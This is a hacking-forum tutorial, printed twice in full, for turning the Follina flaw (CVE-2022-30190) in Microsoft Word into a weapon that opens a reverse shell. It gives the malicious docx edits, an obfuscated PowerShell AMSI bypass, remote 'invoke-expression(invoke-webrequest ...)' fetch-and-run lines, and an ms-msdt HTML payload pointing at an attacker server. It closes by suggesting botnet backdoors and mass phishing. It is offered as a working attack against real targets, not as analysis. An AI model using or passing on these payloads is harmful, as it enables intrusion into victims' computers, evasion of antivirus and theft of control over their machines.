Search
Member List
Calendar
Help
06-08-2022, 03:38 PM
In this tutorial I will be using the github POC for CVE-2022-30190 'Follina' exploit, as well as a working AMSI bypass to help you guys design a doc that opens a revshell on the target PC, minimal experience required as you will be using my own AMSI bypass and skid ripping a revshell from online.
(Steps adapted from https://github.com/JMousqueton/PoC-CVE-2022-30190).
Reverse shells are great for initial access, also the revshell you open will not have any scan interface so you can load even more powershell malware into the process to potentially escalate your privilege and root the box, all from a single document.
Steps:
1. Open Word (used up-to-date 2019 Pro, 16.0.10386.20017), create a dummy document, insert an (OLE) object (as a Bitmap Image), save it in docx.
2. Edit word/_rels/document.xml.rels in the docx structure (it is a plain zip). Modify the XML tag <Relationship> with attribute
Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject"
and Target="embeddings/oleObject1.bin" by changing the Target value and adding attribute TargetMode:
Target = "http://<payload_server>/payload.html!"
TargetMode = "External"
Note the Id value (probably it is "rId5").
3. Edit word/document.xml. Search for the "<o:OLEObject ..>" tag (with r:id="rId5") and change the attribute from Type="Embed" to Type="Link" and add the attribute UpdateMode="OnCall".
NOTE: The created malicious docx is almost the same as for CVE-2021-44444.
4. Go on revshells.com
Scroll down to Powershell #2, in IP at the top input your CNC domain or IP, in port input your port
5. Edit the script in the bottom by removing the " at the end and removing the 'powershell -nop -c " ' at the beginning, these commands start a new powershell process which would be fatal for our attack chain, as every time powershell starts it loads amsi, killing amsi only kills it for the current process.
6. Copy the script and save it as payload.ps1
7. Create AMSI.ps1, in amsi.ps1 put the bypass
$AAAAAAA = $true; $FFFFFF = $null
[Ref].Assembly.GetType([char]83+'ys'+'te'+'m.M'+'a' +[char][byte]110+'age'+'me'+'nt'+'.Au' + 'to'+'mati'+'on.'+'Ams'+'iU'+'ti'+'ls').getfield([char]97+'msi'+'In'+'itF'+'a'+'i'+'led','No'+'nPubl'+'ic,S' + 't'+'at'+'ic').'setvalue'($FFFFFF, $AAAAAAA )
8. At the bottom of AMSI.ps1 put
invoke-expression(invoke-webrequest https://yourserver.com/amsi.ps1)
9. Next you will host both AMSI.ps1 and payload.ps1 on your server using apache, python simpleserver or really any server.
10. Serve the command in the html payload with the ms-msdt scheme at http://yourserver.com/payload.html:
<!doctype html>
<html lang="en">
<body>
<script>
//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA should be repeated >60 times
window.location.href = "ms-msdt:/id PCWDiagnostic /skip force /param \"IT_RebrowseForFile=cal?c IT_SelectProgram=NotListed IT_BrowseForFile=h$(IEX(IWR https://yourserver.com/AMSI.ps1))i/../.....igstub.exe \"";
</script>
</body>
</html>
11. Congratulations, make sure you are hosting all 3 payloads required and that you have a reverse shell open, when your target opens the doc the HTML payload will execute the powershell command to kill AMSI, then with AMSI dead it will load the powershell reverse shell payload, which has no AV stopping it now since the antimalware scan interface is inaccessible.
DISCLAIMER, at the moment this is tested and works, if you have any issues it might be because a skid used my AMSI bypass. I recommend you look at my other post on obfuscation techniques which helps you use basic powershell string formatting to design your own personal working amsi bypass.
NOTES: The payload is a powershell invoke-expression command, initially, so it will execute anything in the pipeline. Basically you do not have to be limited to downloading and running powershell scripts, you can call executables with arguments. For example if you want you can write up a short powershell oneliner to drop a botnet backdoor on the PC, then send out hundreds of thousands of emails from a phishing server and boom, you've got a botnet.
(Steps adapted from https://github.com/JMousqueton/PoC-CVE-2022-30190).
Reverse shells are great for initial access, also the revshell you open will not have any scan interface so you can load even more powershell malware into the process to potentially escalate your privilege and root the box, all from a single document.
Steps:
1. Open Word (used up-to-date 2019 Pro, 16.0.10386.20017), create a dummy document, insert an (OLE) object (as a Bitmap Image), save it in docx.
2. Edit word/_rels/document.xml.rels in the docx structure (it is a plain zip). Modify the XML tag <Relationship> with attribute
Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject"
and Target="embeddings/oleObject1.bin" by changing the Target value and adding attribute TargetMode:
Target = "http://<payload_server>/payload.html!"
TargetMode = "External"
Note the Id value (probably it is "rId5").
3. Edit word/document.xml. Search for the "<o:OLEObject ..>" tag (with r:id="rId5") and change the attribute from Type="Embed" to Type="Link" and add the attribute UpdateMode="OnCall".
NOTE: The created malicious docx is almost the same as for CVE-2021-44444.
4. Go on revshells.com
Scroll down to Powershell #2, in IP at the top input your CNC domain or IP, in port input your port
5. Edit the script in the bottom by removing the " at the end and removing the 'powershell -nop -c " ' at the beginning, these commands start a new powershell process which would be fatal for our attack chain, as every time powershell starts it loads amsi, killing amsi only kills it for the current process.
6. Copy the script and save it as payload.ps1
7. Create AMSI.ps1, in amsi.ps1 put the bypass
$AAAAAAA = $true; $FFFFFF = $null
[Ref].Assembly.GetType([char]83+'ys'+'te'+'m.M'+'a' +[char][byte]110+'age'+'me'+'nt'+'.Au' + 'to'+'mati'+'on.'+'Ams'+'iU'+'ti'+'ls').getfield([char]97+'msi'+'In'+'itF'+'a'+'i'+'led','No'+'nPubl'+'ic,S' + 't'+'at'+'ic').'setvalue'($FFFFFF, $AAAAAAA )
8. At the bottom of AMSI.ps1 put
invoke-expression(invoke-webrequest https://yourserver.com/amsi.ps1)
9. Next you will host both AMSI.ps1 and payload.ps1 on your server using apache, python simpleserver or really any server.
10. Serve the command in the html payload with the ms-msdt scheme at http://yourserver.com/payload.html:
<!doctype html>
<html lang="en">
<body>
<script>
//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA should be repeated >60 times
window.location.href = "ms-msdt:/id PCWDiagnostic /skip force /param \"IT_RebrowseForFile=cal?c IT_SelectProgram=NotListed IT_BrowseForFile=h$(IEX(IWR https://yourserver.com/AMSI.ps1))i/../.....igstub.exe \"";
</script>
</body>
</html>
11. Congratulations, make sure you are hosting all 3 payloads required and that you have a reverse shell open, when your target opens the doc the HTML payload will execute the powershell command to kill AMSI, then with AMSI dead it will load the powershell reverse shell payload, which has no AV stopping it now since the antimalware scan interface is inaccessible.
DISCLAIMER, at the moment this is tested and works, if you have any issues it might be because a skid used my AMSI bypass. I recommend you look at my other post on obfuscation techniques which helps you use basic powershell string formatting to design your own personal working amsi bypass.
NOTES: The payload is a powershell invoke-expression command, initially, so it will execute anything in the pipeline. Basically you do not have to be limited to downloading and running powershell scripts, you can call executables with arguments. For example if you want you can write up a short powershell oneliner to drop a botnet backdoor on the PC, then send out hundreds of thousands of emails from a phishing server and boom, you've got a botnet.
- The Powershell god Kabuto